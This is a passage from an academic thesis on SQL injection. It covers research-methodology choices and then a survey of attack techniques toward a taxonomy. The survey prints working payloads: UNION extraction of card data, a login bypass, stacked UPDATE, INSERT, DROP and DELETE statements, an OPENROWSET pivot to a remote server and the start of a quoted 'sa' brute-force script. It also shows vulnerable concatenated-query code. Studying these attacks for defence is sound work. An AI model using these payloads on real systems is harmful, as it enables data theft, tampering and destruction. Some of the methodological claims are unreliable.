of its application in Information Technology, Lebowitz (1998) suggests that
laboratory-based experimentation is not adequate for this field. He takes his point further
by stating that any Information Technology research that conducts experimentation is
doomed to fail.
4Surveys
According to Hutchinson (2004) this is the simplest strategy for obtaining information,
and questionnaires and interviews are the most commonly used data collection methods
in this strategy. Surveys do offer a good strategy for satisfying positivism’s appetite
for internal validity. They can theoretically produce vast amounts of data, e.g. as in a
census, which can be used to produce internal validity according to Yin’s (1989) and
Lee’s (1989) guidelines for positivistic research. However, questionnaires and
similar data collection methods are by definition limited in length, which can be an obstacle
to conducting research using this strategy (Saunders, Lewis, & Thornhill 2003).

4Case-Study
Yin (1984), cited by Sarker (1998), defines a case-study as empirical research that, through
the use of many sources of evidence, studies a contemporary phenomenon in an ordinary
context where the frontier between context and phenomenon is not clearly defined. This
view is also shared by Robson (2003), cited by Saunders, Lewis, & Thornhill (2003). A
case-study can focus on a single individual, a group or an organization, and even an event. It
can also bridge across other case-studies so that conclusions can be drawn from
the similarities and differences with other cases (Hutchinson 2004). Case-studies stand
roughly halfway between positivism and interpretivism, making them a rather special
strategy, as they can be used both to corroborate a well-defined theory-based hypothesis and to
infer Knowledge by induction (Saunders, Lewis, & Thornhill 2003).
4Grounded-Theory
This theory emerged in 1967 by the hand of two researchers, Glaser and Strauss, and it
aims to combine both deduction and induction toward the formulation of a
consolidated theory (Dawson 1999; Saunders, Lewis, & Thornhill 2003). Unlike in
experimentation, the primary input is data and not a theory. From this data a theory is
formulated through induction. The solidity of the theory can then be validated by means
of deduction, in that the input data that led to the formulation of the theory
should equal the output produced by executing that theory (Saunders,
Lewis, & Thornhill 2003). Grounded-theory constitutes the basis of neural networks.

4Ethnography
Ethnography aims at studying the culture of a group and is therefore highly inductive
in nature, as expected in the Social Sciences. Its primary goal is to address the needs of
Anthropology and it does not really apply to an Information Systems scenario.
4Action Research
To Dawson (1999), action research is better understood as a methodology than as
a research method. The researcher works in close relationship with a group of individuals
and acts more like a facilitator in the quest for a consensus. Because it is all about
humans, co-researching is not a role all of the participants are willing to play throughout
the entire process. In this regard, the group will undergo four steps iteratively:
a) planning; b) action; c) observation; and d) reflection. Marsick & Watkins (1997) and
Coghlan & Brannick (2001), cited by Saunders, Lewis, & Thornhill (2003), state that action
research is different from other forms of applied research since, in addition to
describing, understanding and explaining, its true focus is to promote change, namely
changing groups of people such as corporations. One of the soundest definitions
of action research has been proposed by Rapport (1970), cited by McDonagh (2004),
who suggests that action research tries to contribute as much to the practical concerns
related to a situation as to the objectives of the Social Sciences, by means of a mutually
accepted framework of understanding.
Though action research has been interpreted in many different ways, the literature refers to
three distinct aspects (Saunders, Lewis, & Thornhill 2003). The first aspect focuses on the
prime purpose behind action research, which is change management (Cunningham
1995, cited by Saunders, Lewis, & Thornhill 2003). The second aspect deals with the
involvement of practitioners in the research, particularly the closeness between
practitioners and researchers. The third and final aspect indicates that the implications of
action research should reach beyond the immediate project for which it has been conducted,
so that it is clear its results can be applied in different contexts. Avison et al. (1999)
wrap up these three aspects by portraying action research as the combination of
theory and practical knowledge, and of practitioners and researchers, through change
and reflection on an immediate problematic situation by way of an ethical framework
which is reciprocally accepted. Avison et al. (1999) also add that action research is an
iterative process where the parties involved act together on a particular cycle of activities:
problem diagnosis, active participation, and learning reflection. Susman and Evered (1978),
cited by Whitman & Woszczynski (2004) and Baskerville (1999), systematize this cycle into
five steps:
• Diagnosis – Identifying the research question;
• Action planning – Determining which actions are to be carried out in order to
address the research question;
• Action implementation – Conducting and controlling the actions previously
planned;
• Evaluation – Determining whether the actions did answer the research question;
• Lessons Learned – Documenting the knowledge obtained from the
implementation of the project.
Schein (1995), cited by Saunders, Lewis, & Thornhill (2003), suggests that there are two
motivations for conducting action research. The first is that action research
seeks to satisfy the interests of those involved in it, which are not necessarily
the interests of the sponsor, although this does not mean the sponsor will
not benefit from it. The second is triggered by the sponsor who, motivated by
a particular need, involves the researchers in the hope of addressing that need.
Regardless of the underlying motivation for action research, the sponsor/owner of the
project is always assisted in gaining new diagnostic skills and problem resolution expertise
within his organization.
4 Temporal Horizons
The underlying question behind temporal horizons, which is tightly coupled with the
research question, is whether the research should be a snapshot of reality taken at a particular
moment or, in contrast, should address a time period. Figure 25 - The Research
Process “Onion” on page 105 shows how temporal horizons relate to research
philosophies. Human-related realities are expected to be volatile by nature, whereas
findings in the field of Natural Sciences are commonly expressed as “laws”, which gives
them a rather immutable ring. The associated temporal horizons are respectively named
longitudinal and cross-sectional (Saunders, Lewis, & Thornhill 2003).
4 Multiple Methods: Triangulation
According to the literature (Dawson 1999; Gephart 1999b; Saunders, Lewis, & Thornhill 2003),
research approaches and strategies do not stand on their own, compartmentalized and
isolated, and therefore they can be mixed. In truth, it is expected that in most cases,
especially in the case of Information Systems, reality cannot be described in terms of
black and white, as it is closer to many different shades of gray. What better
proof of this statement than the existence of such a prolific set of research approaches,
philosophies, strategies and so forth? Interpretivism is itself the product of a not so
organized reality. Triangulation acknowledges this fact, and its base principle is neatly
expressed in the name it has been given. Triangulation takes into account several vectors
of Knowledge produced by different research approaches, and even opposite
philosophies, and performs what in radio language is called a triangulation. Radio
triangulation consists in determining the origin of a signal, in this case “the reality”
under study, based on the direction of two or more incoming signals, in this case the
findings produced by several methods. Saunders, Lewis, & Thornhill (2003) define
triangulation as the use of multiple data collection methods as a means to ensure that what
the data reveals is what the researcher thinks the data is telling. Jick (1979), cited by
Dawson (1999), adds that in positivistic research multiple data collection methods
provide inherent benefits and a broader, more representative perspective of the test
subjects. Dawson (1999) argues that, beneficial as this is, the real benefit of triangulation
is the complete absence of pre-imposed restrictions. Saunders, Lewis, & Thornhill (2003)
summarize the role of triangulation, and research methods in general, as a highly creative
process where the researcher’s imagination plays an important role in the quest for
answering the research question.
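The radio analogy can be made concrete with a small geometric sketch: two observers at known positions each report only the direction in which they perceive the signal, and the source is recovered as the point where the two directions cross. The function name, the coordinate convention (bearings in degrees, measured counter-clockwise from the positive x-axis) and the sample values are assumptions made purely for illustration.

```python
import math


def triangulate(p1, bearing1_deg, p2, bearing2_deg):
    """Locate a source from two observation points and the bearing seen from each.

    Bearings are in degrees, counter-clockwise from the positive x-axis
    (a convention assumed for this sketch).
    """
    d1 = (math.cos(math.radians(bearing1_deg)), math.sin(math.radians(bearing1_deg)))
    d2 = (math.cos(math.radians(bearing2_deg)), math.sin(math.radians(bearing2_deg)))
    # Solve p1 + t*d1 == p2 + s*d2 for t using the 2D cross product.
    denom = d1[0] * d2[1] - d1[1] * d2[0]
    if abs(denom) < 1e-12:
        raise ValueError("bearings are parallel; the source cannot be located")
    dx, dy = p2[0] - p1[0], p2[1] - p1[1]
    t = (dx * d2[1] - dy * d2[0]) / denom
    return (p1[0] + t * d1[0], p1[1] + t * d1[1])


# Two observers ten units apart, each seeing the signal at a different angle.
source = triangulate((0.0, 0.0), 45.0, (10.0, 0.0), 135.0)
```

A single bearing only constrains the source to a line; it takes a second, independent bearing to fix a point, which mirrors the argument that findings from one method alone leave “the reality” under-determined.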

CRITICAL ANALYSIS
Similar to the literature review process, the methodology review procedure carried out herein
is critical in nature. Though a critical approach has already been used
throughout the entire review process, in this section the findings will undergo a more
thorough analysis in terms of their alignment with this work’s objectives. However, the
extent of this analysis will not include arguing the validity of the different research
approaches. The analysis will therefore not dive into considerations on the merit of these
approaches, as it is this researcher’s belief, also shared by some literature sources herein
referenced (Saunders, Lewis, & Thornhill 2003), that all research methods are equally
worthy as long as they serve the objectives of the research.
4 Lessons Learned
It has been clearly established that there is a rich, mature, and well-established taxonomy
of research methods, approaches, and strategies, and that their relative positioning can
be easily understood from the diagram in Figure 25 - The Research Process “Onion” on page
105. This richness does produce enough internal evidence to conclude that studying
some realities, namely the ones which by nature are hard to systematize, is no simple
matter.
Maybe one of the best pieces of advice yielded by this review is that of Saunders, Lewis, &
Thornhill (2003), who think of research as a highly creative process where the
researcher’s imagination plays an important role in the quest for answering the research
question. They also state that the research philosophy the researcher is likely to
adopt depends to a great extent on the researcher’s own predisposition toward problem
solving; hence any research is bound to carry the mark of its researcher. This
reasoning will probably make some positivists pull their hair out, but fundamentalism is
rarely the path to enlightenment, so this researcher opts to take Saunders, Lewis, &
Thornhill’s (2003) suggestion and look at research as a highly creative process
in which each new perspective brought in by new works of different researchers will
add up to a better collective understanding of the reality under study.
The final lesson taken from this review process is that right or wrong seems not
to exist; instead, things should be put in terms of “does it help to address any of the
objectives of the research?”. This lesson has a profound impact when formulating the
research methods, as it provides the freedom to navigate across the research process
onion at will, choosing the most promising methods for a specific research goal.
4 Refutation of Research Approaches
Dismissal of research approaches will not be made on the basis of the pseudo-merit of
each approach or be influenced by any epistemological pre-judgment, but on this
researcher’s belief as to whether it will be useful and feasible for addressing a specific objective
of this research as per the «Scope» topic under the introductory chapter (see note 12).
• Surveys – Although surveys could be used in addressing objectives a) and d),
the literature review process revealed there is enough information already;
• Ethnography – The applicability scope of this approach falls well within the
Anthropology realm;
• Case-Study – As per the findings of this review process, the applicability scope
of a case-study is primarily the case under study, although it is highly desirable
that results can be used in different scenarios. In most cases, this can only be
achieved by constructing validity, for example by having other case-studies
corroborate the results. As established in the introductory chapter and later
during the literature review process, SQL Injection is a global,
systems-transversal, vendor-agnostic threat. Therefore, although there is no
objective stating that one of the goals of this work is to build
Knowledge that is cross-sectional, the fact that the problem under study is so by
nature dismisses case-study as an approach. However, frontiers are very thin.
Each time a test subject is used to prove a point or build internal validity,
as in objective d), isn’t this in fact a case-study in a way?
• Grounded-Theory – This approach stands roughly halfway between induction
and deduction and it requires data in order to build an initial theory. Data is
something that in the present context is just not there, which invalidates the
use of grounded-theory.
12
a) Systematize the most commonly used set of practices and systems architectures used for implementing
e-Business platforms;
b) Establish a clear dependency of e-Business systems on relational database management systems;
c) By investigating different variations of SQL Injection and modi operandi, propose a taxonomy;
d) Perform experimentation and ultimately answer the research question;
e) Based on the gained experience, propose simple first line defensive techniques.
4 Direct Implications
If to the findings of the review process we add the lessons that have been learned and
the approaches that have been dismissed, the outcome is the direct implications.
The first implication is that, since all of critical realism’s defining bastions have been
dismissed, this research will definitely not have any traces of critical realism.
The second is that this research relies on ontologically opposite approaches,
experimentation and action research, to address its objectives. Literature review plays a
very important role, as it directly addresses several objectives and supports others.

RESEARCH METHODS
As specified in the objectives of this work, the research question clearly requires
experimentation in order to be proven right or wrong, thereby involving sampling of test
subjects and a deductive approach, the far top end of the research process onion. On the
other hand, the real challenge is to develop the supporting taxonomy and subsequently,
out of the experience gained, suggest a first line of countermeasures. Developing the
taxonomy will be a spiralling procedure where the researcher and his know-how play an
enormous part, hence placing him as part of the research process. This means that action
research is used, the opposite far end of the research process onion. Therefore, in order
to answer the research question, it is necessary to use triangulation; yet this does not
necessarily mean the secondary objectives are inherently met. For this reason, it makes
sense to consider research methods on a per-objective basis.
>
OBJECTIVE I
SYSTEMATIZE THE MOST COMMONLY USED SET OF PRACTICES AND SYSTEMS ARCHITECTURES USED FOR
IMPLEMENTING E-BUSINESS PLATFORMS
This objective was already met by the literature review process and the underlying
review of the background description of this research. The findings presented
more than enough information and internal validity to consider this objective met.
>
OBJECTIVE II
ESTABLISH A CLEAR DEPENDENCY OF E-BUSINESS SYSTEMS ON RELATIONAL DATABASE MANAGEMENT
SYSTEMS
Like Objective I, Objective II was fully achieved by means of a literature review.
Both these objectives serve to build a strong case for why SQL Injection is so relevant
on a global network of runtime interactions, as the backbone of e-Business is
relational database management systems.

>
OBJECTIVE III
BY INVESTIGATING DIFFERENT VARIATIONS OF SQL INJECTION AND MODI OPERANDI, PROPOSE A
TAXONOMY
Literature review plays an important role here, as a survey of the existing techniques is
required in order to build a taxonomy. Because SQL Injection is still a rather
obscure subject, the literature review process must take this fact into account in its
quest for information sources. Sources that would otherwise seem inappropriate
must be considered here, including underground sources, hacking communities and
peer-to-peer networks. This mindset was used in the literature review process as
laid out in the corresponding chapter. Still, literature review does not offer all the
elements for constructing such a taxonomy. The researcher will have to validate
attack variations in terms of category, concept, modus operandi, effectiveness
and applicability scope. This procedure will involve experimentation and poking
around test systems in order to determine the best compartmentalization for the
different types of attacks. This constitutes a deductive approach and therefore it is
a typical case of experimentation.
>
OBJECTIVE IV
PERFORM EXPERIMENTATION AND ULTIMATELY ANSWER THE RESEARCH QUESTION
The purpose of this objective is to build some internal validity. A mixture of
literature review, know-how and recently gained experience will be the key factors
when conducting experimentation on a real system. The results of the actual tests
will then be analysed using a mere yes/no positivistic approach.
>
OBJECTIVE V
BASED ON THE GAINED EXPERIENCE, PROPOSE SIMPLE FIRST LINE DEFENSIVE TECHNIQUES
Like Objective IV, this objective will rely heavily on literature review, know-how
and recently gained experience as a means of proposing a set of first line
defensive techniques.

Chapter 4
ATTACK TAXONOMY
Taxonomy refers to either a hierarchical classification of things, or the
principles underlying the classification. Almost anything,
animate or inanimate objects, places, and events, may be
classified according to some taxonomic scheme. Some
have argued that the human mind naturally organizes its
knowledge of the world in a taxonomic fashion.
This chapter sets out to define a scheme that partitions a body of Knowledge
and defines the relationships among its pieces in order to streamline the
classification and understanding of the SQL Injection threat. The chapter divides
into two sections, one containing a representative ad-hoc survey of existing
techniques which will form the basis for the second section, the formulation of
the taxonomy.

attack taxonomy •
SURVEY OF TECHNIQUES
Taxonomies are all about hierarchical classification and partitioning of a body of
Knowledge. This implies that Knowledge must already be present for a taxonomy to be
formulated. Rather than posing as a means for producing Knowledge, taxonomies offer
a structured way to scrutinize a reality and a means to leverage the formulation of novel
Knowledge. For this matter it is necessary to perform a survey of the existing techniques.
Since at present time no taxonomy has been attempted, this survey will inevitably be
somewhat ad-hoc. On the other hand, it cannot be a blind dump of all the samples the
researcher laid his hands on, as such a practice would most certainly prove
unproductive. Therefore the researcher will play an important role in assessing the value
of each approach and determining which contribute to the formulation of the
taxonomy. In order to minimize the entropy of the survey and give it some breakdown
structure, Landsmann & Strömberg’s (2003) list of attack steps will be used as a
navigation beacon for the ad-hoc survey. They propose six steps attackers may combine
iteratively in an attack in order to fulfil their objectives. These are transcribed here:
• Setting the objective – Whether explicit or arbitrary, attackers have one or more
objectives for conducting SQL Injection attacks. A concrete example might be
that an attacker wants to access the Web application in order to obtain
information about a corporation’s customers. This is an attack on the security
service confidentiality;
• Choosing the method – In some cases, the attacker is only interested in gaining
access to the Web application and therefore tries to bypass authentication. In
other cases, bypassing authentication is only one step before he can try to
reach his objectives. Hence, several methods can be chosen;

• Examining prerequisites – In order to determine if the objectives can be
reached, the attacker systematically checks which prerequisites are supported.
Prerequisites may be necessary conditions for a given attack method, or make
the attack easier to conduct;
• Testing for vulnerabilities – The attacker begins testing for vulnerabilities to
exploit, e.g. experimenting with input validation by entering single quotes,
enumerating privileges or evaluating returned information;
• Choosing means – Depending on supported prerequisites and found
vulnerabilities, the attacker chooses his means for the attack;
• Designing the query – The query designed by the attacker needs to follow the
proper structure of a SQL query expected by the RDBMS. If not, syntax errors
are generated and potentially displayed in error messages. One example of
syntax errors relates to quotation marks, i.e. if SQL Injection is possible without
escaping them. Another example is if parentheses are used in the underlying
query. Depending on the objective, other syntax errors that concern
information retrieval of database structure may have to be overridden.
Examples of such errors include table names, column names, number of
columns and data types.
This survey of existing techniques will inevitably refer to code samples and use cases that
due to their nature can be used to depict a representative variation of the six iterative
steps herein presented.

► Setting the Objective
Setting the objective of the attack is something of an implicit prerequisite for the whole
attack lifecycle. Nonetheless, it is an important step worth mentioning, as it sets out
the action plan for the attack. Even if little or nothing can be systematized with regard to the
underlying motivation of the offender for perpetrating the attack, the attack will
undoubtedly affect at least one information asset by compromising one or more security
services. The literature identifies the following as the main security services affected by SQL
Injection (Álvarez & Petrovic 2003; Huang et al. 2004; Landsmann & Strömberg
2003; Yuhanna 2003):
• Access Control – involves ensuring that users can only access and manipulate
data and perform operations according to their privileges;
• Availability – indicates that the services offered by a network resource such as a
Web application must be available to users when they request them;
• Authenticity – deals with ensuring that users who use a network resource such
as a Web application are who they claim to be;
• Confidentiality – deals with ensuring that information is kept secret. This
security service can be divided into privacy and secrecy;
• Privacy – indicates that information assets such as personal information,
concerning employees and customers must be kept secret;
• Secrecy – states that sensitive business-related information must be kept secret;
• Integrity – information consistency must be maintained;
• Auditability – also known as chain-of-custody. All changes performed on an
information asset must be traced, typically by means of a log.

► Choosing the Method
Much as in research, a collection of methods is chosen to address the
objectives previously set out. Once the collection of objectives is established and the list of
security services formulated, the attacker must then choose the tools of his trade, the
weapons for the duel. These attack methods can vary endlessly, as there are
unlimited variations of SQL Injection attacks (Álvarez & Petrovic 2003). Still, it is possible
to break them down into action-type categories. These atomic categories can then be
used in building a consolidated strategy for implementing the means to perpetrate an
attack and fulfil at least one of the objectives. What all attack methods have in common is
that they rely on two factors: a legitimate base query is used as a carrier wave for a
piggy-backed malicious statement (Anley 2002b; Kost 2003; Sam M.S. 2005), and
injection attacks strictly rely on the SQL dialect implemented by the underlying RDBMS
(Anley 2002b; Halfond & Orso 2005a; Halfond & Orso 2005b; Livshits & S.Lam 2005).
► Data Manipulation
Data manipulation can potentially extend to the full DML (Data Manipulation Language)
stack depending on a number of factors. For example, if the sysadmin applies the least
privilege principle, the chances of illegitimate access are reduced and the scope of
accessible DML statements is limited. Data manipulation deals with the possibility
to retrieve, change, fabricate or delete data in a database through the use of SQL
commands.
As an example, let’s assume the following base query is the legitimate carrier wave used
on a page that takes user input in order to find a list of products:
Select * From Products Where Description Like '%<user input>%'
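The way such a carrier query comes into being can be sketched in a few lines. The sketch below is only an illustration under stated assumptions: it uses Python and an in-memory SQLite database as a stand-in for the RDBMS, and the names compose, benign and broken are hypothetical. It shows that the user input is spliced verbatim into the SQL text, so a single quote inside the input terminates the string literal early and changes the structure of the statement.

```python
import sqlite3

# Hypothetical stand-in for the page's base query; {} marks the user input.
BASE_QUERY = "Select * From Products Where Description Like '%{}%'"

def compose(user_input):
    """Splice the raw user input into the carrier query (the vulnerable pattern)."""
    return BASE_QUERY.format(user_input)

# In-memory SQLite database used as a stand-in RDBMS (assumption).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE Products (Description TEXT)")
conn.execute("INSERT INTO Products VALUES ('Digital Photo Camera')")

# A benign search term yields a well-formed query.
benign = compose("Camera")
rows = conn.execute(benign).fetchall()

# A term containing a single quote closes the literal early, so the
# remainder of the input is parsed as SQL and the statement is malformed.
broken = compose("O'Neil")
try:
    conn.execute(broken)
    quote_error = None
except sqlite3.OperationalError as exc:
    quote_error = str(exc)

print(benign)
print(rows)
print("syntax error raised:", quote_error is not None)
```

The syntax error in the last step is the same symptom an attacker looks for when probing an input field with a single quote.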

Suppose the following T-SQL script was inserted on the product search textbox:
xads@233ª~ºs2'
UNION ALL
Select * from CreditCardNumbers --
There is a base query that will try to find a product containing the “xads@233ª~ºs2”
string in its description, but also a second query piggy-backed on the first by means of a
UNION operator. The combined statement only executes if the structure of the second
query’s resultset¹³ matches the structure of the primary query, that is, the same number
of columns with compatible data types; otherwise the RDBMS raises an error. Finally, the
remaining piece of the base query, the “%'” portion, is
ignored by means of a comment sign “--”. Because it is very unlikely that there is a
product with a description containing “xads@233ª~ºs2”, the base query contributes no
rows and the resultset holds only the rows of the piggy-backed query.
While it is true that the hacker must be aware of the existence of a table named
[CreditCardNumbers], there are other statements, such as the DDL (Data Definition
Language) stack, that can be used to reveal the inner structure of a database or even of an
RDBMS.
¹³ The resultset is a tabular view of the results yielded by a query. Each column has a name and a data type.
► Authentication Bypass
An attacker may use this method to pretend to be a legitimate user by bypassing an
authentication mechanism and being granted that user’s privileges. Consider the
following ASP.NET code-behind script excerpt written in VB.NET in order to authenticate
a user who fills in a page containing a login and a password textbox (Spett 2002):

' Build the query by concatenating raw request parameters (the vulnerable pattern)
Dim myCommand As New System.Data.SqlClient.SqlCommand("", myConnection)
myCommand.CommandText = "SELECT Count(*) FROM Users WHERE Username='" & _
    Request.Params("strUsername") & _
    "' AND Password = '" & _
    Request.Params("strPassword") & "'"
Dim boolAuthenticated As Boolean = False
' Any matching row authenticates the user
If CInt(myCommand.ExecuteScalar()) <> 0 Then
    boolAuthenticated = True
End If
Here is what happens when a user submits a username and password. The query will go
through the [Users] table to see if there is a row where the username and password in
the row match those supplied by the user. If such a row is found, the boolAuthenticated
variable is set to true, whereas if there is no row that the user-supplied data matches, the
boolAuthenticated variable will remain false and the user will not be authenticated. If no
character validation is performed on strUsername and strPassword, an attacker could
modify the actual SQL query structure so that the query reports a match
even if he does not know a valid username or password. Suppose the attacker entered
the following as both login and password:
' OR ''='
The base query would evaluate to:
SELECT Count(*) FROM Users WHERE
Username='' OR ''='' AND Password = '' OR ''=''
Instead of comparing the user-supplied data with that present in the [Users] table, the
query compares '' (empty) to '' (empty), which will always return true. Because AND
binds more tightly than OR, the trailing OR ''='' alone makes the WHERE clause true for
every row, so the query will yield a value greater than zero as long as the table is not
empty.
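The bypass described in this section can be reproduced in a small, self-contained sketch. It is an illustration only, under stated assumptions: Python and an in-memory SQLite database stand in for the ASP.NET page and the RDBMS, and the helper names make_db, login_concatenated and login_parameterized, as well as the sample user, are hypothetical. The first function mirrors the concatenation pattern of the excerpt; the second binds the same input as parameters, so the input is treated as data rather than as SQL text.

```python
import sqlite3

def make_db():
    """Create a throwaway in-memory Users table (stand-in for the real RDBMS)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('alice', 's3cret')")
    return conn

def login_concatenated(conn, username, password):
    """Vulnerable pattern: user input is concatenated into the SQL text."""
    sql = ("SELECT Count(*) FROM Users WHERE Username='" + username +
           "' AND Password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] != 0

def login_parameterized(conn, username, password):
    """Same check, with the input bound as parameters instead of spliced in."""
    sql = "SELECT Count(*) FROM Users WHERE Username=? AND Password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] != 0

conn = make_db()
payload = "' OR ''='"  # the input discussed in the text

print(login_concatenated(conn, payload, payload))   # True: the tautology matches every row
print(login_parameterized(conn, payload, payload))  # False: the payload is compared as a literal
```

With bound parameters the quote characters never reach the SQL parser, which is why the second call fails to authenticate.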

► Information Retrieval
According to Landsmann & Strömberg (2003), attackers can try to manipulate or execute
SELECT statements in order to get access to information beyond their privileges. This
could be achieved by e.g. manipulating the WHERE clause. One example of this is that
more rows than intended can be retrieved from the table specified in the original query.
Another example is by using UNION, causing rows from more tables to be returned than
specified in the original query as in a previous example.
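Both retrieval routes just named, truncating the WHERE clause and piggy-backing a UNION, can be sketched against a toy database. This is a minimal illustration under stated assumptions: Python and an in-memory SQLite database stand in for the Web application and the RDBMS, the search function and the sample rows are hypothetical, and the table and column names simply follow the examples used in this chapter.

```python
import sqlite3

# In-memory SQLite database with dummy data (assumption, for illustration only).
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE Products (Description TEXT, Price REAL, isGoldCustomer INTEGER);
    INSERT INTO Products VALUES ('Digital Photo Camera', 300, 0);
    INSERT INTO Products VALUES ('Digital Photo Camera', 250, 1);
    CREATE TABLE CreditCardNumbers (Holder TEXT, Number TEXT, Expiry TEXT);
    INSERT INTO CreditCardNumbers VALUES ('J. Doe', '0000-0000-0000-0000', '01/99');
""")

def search(term):
    """Vulnerable search: the term is concatenated into the carrier query."""
    sql = ("Select * From Products Where Description Like '%" + term +
           "%' and isGoldCustomer=0")
    return conn.execute(sql).fetchall()

# Intended use: only the row visible to ordinary customers comes back.
normal = search("Digital%Photo%Camera")

# Comment truncation: everything after "--" is ignored, including the
# isGoldCustomer filter, so more rows than intended are returned.
widened = search("Digital%Photo%Camera' --")

# UNION piggy-back: the base query matches nothing and the rows of a second
# table are appended. This works here because both SELECT lists have three
# columns; a different column count would raise an error instead.
unioned = search("no-such-product' UNION ALL Select * from CreditCardNumbers --")

print(len(normal), len(widened))
print(unioned)
```

The column-count condition in the last step is the reason attackers need to learn the shape of the carrier query's resultset before a UNION can succeed.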
Consider the following base query used on an Internet page that takes user input in order
to find a list of products, where the e-Commerce frontend is also used as an Extranet,
so that prices vary according to the type of customer:
Select * From Products Where Description Like '%<user input>%' and
isGoldCustomer=0
Suppose the following T-SQL script was inserted on the product search textbox:
Digital%Photo%Camera' --
It does look simple, yet, without knowing a thing about the database structure, it was
possible to get rid of the clause that kept the user away from products meant only
for privileged customers.
► Information Manipulation
Attackers can try to manipulate or execute UPDATE statements in order to alter
information beyond their privileges (Landsmann & Strömberg 2003). Let’s consider the
previous example where the user is searching for a product based on its description.

If the following T-SQL script was inserted on the product search textbox:
';
Update Products set Price=1 Where Description Like '%Digital%Camera%' --
The resulting query would be equal to:
Select * from Products where Description Like '%';
Update Products set Price=1 Where Description Like '%Digital%Camera%' -- %'
The “;” separator allows a second query to be executed, and the “--” comment sign
discards what remains of the first query. The second query could then be used to
lower the price of a particular product to a more affordable figure.
► Information Fabrication
Attackers can try to manipulate or execute INSERT statements in order to alter
information beyond their privileges (Landsmann & Strömberg 2003). Let’s consider the
previous example presented in the Authentication Bypass section, where the backend
Web application performed a row count to determine if the user had supplied valid
credentials. Suppose the Web application was a bit more intelligent and actually retrieved
user information in order to use it across all the pages, for example, by means of a cookie.
In this case, the previous attack method would not succeed. Fabricating a new user
would come in handy, and then it would be a matter of using real and valid credentials.
This could be achieved by means of an insert statement piggy-backed on the first query,
and it would be only a matter of introducing the following script for username:
';Insert Into Users (username, password) values ('hacker','hacked') --
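The stacked-statement pattern shared by the manipulation and fabrication methods can be sketched as follows. This is an illustration under stated assumptions rather than a faithful reproduction of the SQL Server behaviour: Python and an in-memory SQLite database stand in for the application and the RDBMS, and sqlite3's executescript() is used deliberately as a stand-in for a driver that submits the whole batch, since sqlite3's execute() accepts only one statement at a time. The function name search_batch and the sample rows are hypothetical.

```python
import sqlite3

# In-memory SQLite database with dummy data (assumption, for illustration only).
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE Products (Description TEXT, Price REAL);
    INSERT INTO Products VALUES ('Digital Photo Camera', 300);
    CREATE TABLE Users (username TEXT, password TEXT);
""")

def search_batch(term):
    """Vulnerable search that sends the composed text as a batch.

    executescript() stands in for an RDBMS driver that runs every
    statement separated by ";" (assumption; see the lead-in).
    """
    sql = "Select * From Products Where Description Like '%" + term + "%'"
    conn.executescript(sql)

# Manipulation: the piggy-backed UPDATE rewrites the price.
search_batch("'; Update Products set Price=1 "
             "Where Description Like '%Digital%Camera%' --")

# Fabrication: the piggy-backed INSERT creates a new user row.
search_batch("'; Insert Into Users (username, password) "
             "values ('hacker','hacked') --")

price = conn.execute("Select Price From Products").fetchone()[0]
users = conn.execute("Select username From Users").fetchall()
print(price)
print(users)
```

Whether a given deployment is exposed to this pattern depends on whether its data access layer allows several statements per call, which is one of the prerequisites an attacker has to examine.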

► Information Deletion
Attackers can try to manipulate or execute DELETE or DROP statements in order to alter
information beyond their privileges (Landsmann & Strömberg 2003). For example, the
following piggy-back statement would drop the logging table:
';Drop Table TransctionsLogging --
This would wipe out all the purchase requests without any trace:
';Truncate Table PurchaseRequests --
And this would delete a specific user and maybe erase any evidence that a user had been
maliciously created on a previous occasion:
';Delete from Users Where UserName='hacker' --
► Extending to Other Data Sources with OleDb
The attack methods presented to this point only aimed at data stored on the RDBMS that
supports a database-driven application. But the scope of the attack could very well
expand beyond the initial RDBMS and target other data sources.
Most data sources, and not just RDBMSs, implement ODBC or OleDb. These are
standardised interfaces, or middleware, for accessing a database from a program,
providing an abstraction layer between the RDBMS and the consumer application. It is
safe to say any commercial RDBMS implements at least one of these interfaces, if not
both. From a consumer’s perspective, ODBC can be consumed by OleDb using a specific
provider called OleDb provider for ODBC data sources, so if a consumer application can
consume OleDb, it implicitly consumes ODBC as well. This abstraction layer makes it
possible to interoperate data sources from different vendors and to orchestrate distributed
queries across several systems. The following list contains the ODBC/OleDb compliant
data source providers most commonly installed by default on Windows systems,
or easily accessible and installed by non-technical users:
• Text file;
• Microsoft Access;
• Microsoft Dbase;
• Microsoft Excel;
• Microsoft Paradox;
• Microsoft Visual FoxPro;
• Microsoft SQL Server;
• Microsoft SQL Server Analysis Services;
• Oracle ODBC Provider;
• IBM DB2;
• Microsoft Active Directory.
These data sources, amongst others, could participate in a distributed query triggered by
the RDBMS that is being manipulated with SQL Injection. More interesting is the fact that
a great many of these providers belong not to an RDBMS but to applications.
Microsoft SQL Server’s known flexibility (Cerrudo 2002) makes it possible to take advantage of
OleDb data sources by means of OPENROWSET and OPENQUERY.

>
MICROSOFT SQL SERVER DATABASES
Accessing remote databases hosted on a MS SQL Server system could be achieved
by invoking the OPENROWSET function and using the corresponding SQL Server
OleDb Provider. The following example will connect to a remote SQL Server and
retrieve its version. Other, more intrusive statements could also be injected:
exec sp_executesql N'select * from OPENROWSET(''SQLOLEDB'',''remoteServer.net'';''sa'';''password'',''select @@version'')'
This example requires knowledge of the credentials for connecting to the
remote server. Nonetheless, these could be omitted, and the network credentials
used to establish a foothold on the first RDBMS would be propagated onto the
second RDBMS. This result would be achieved simply by removing the username
and password piece from within the query. Typically, within a corporate network
environment based on Windows, this would be a domain account stored on the
Active Directory (see Figure 22 - The Four Points of Authentication of a
Database-Enabled Remote Web Request on page 91 and Figure 24 - User vs.
Account Impersonation on a Web Application on page 92).
Anley (2002a) proposed a brute-force method for those cases when the same
network credentials cannot be used to connect to the remote RDBMS. According
to him, «since this OPENROWSET authentication is instant, and involves no
timeout in the case of an unsuccessful authentication attempt, it is possible to
inject a script that will brute-force the “sa” password, using the server's own
processing power. The xp_execresultset method must be used for this, since it
allows many unsuccessful authentication attempts to be executed in a WHILE
loop». He also includes a MS SQL 2000 T-SQL script to do the trick:

declare @username nvarchar(4000), @query nvarchar(4000)
declare @pwd nvarchar(4000), @char_set nvarchar(4000)
declare @pwd_len int, @i int, @c char
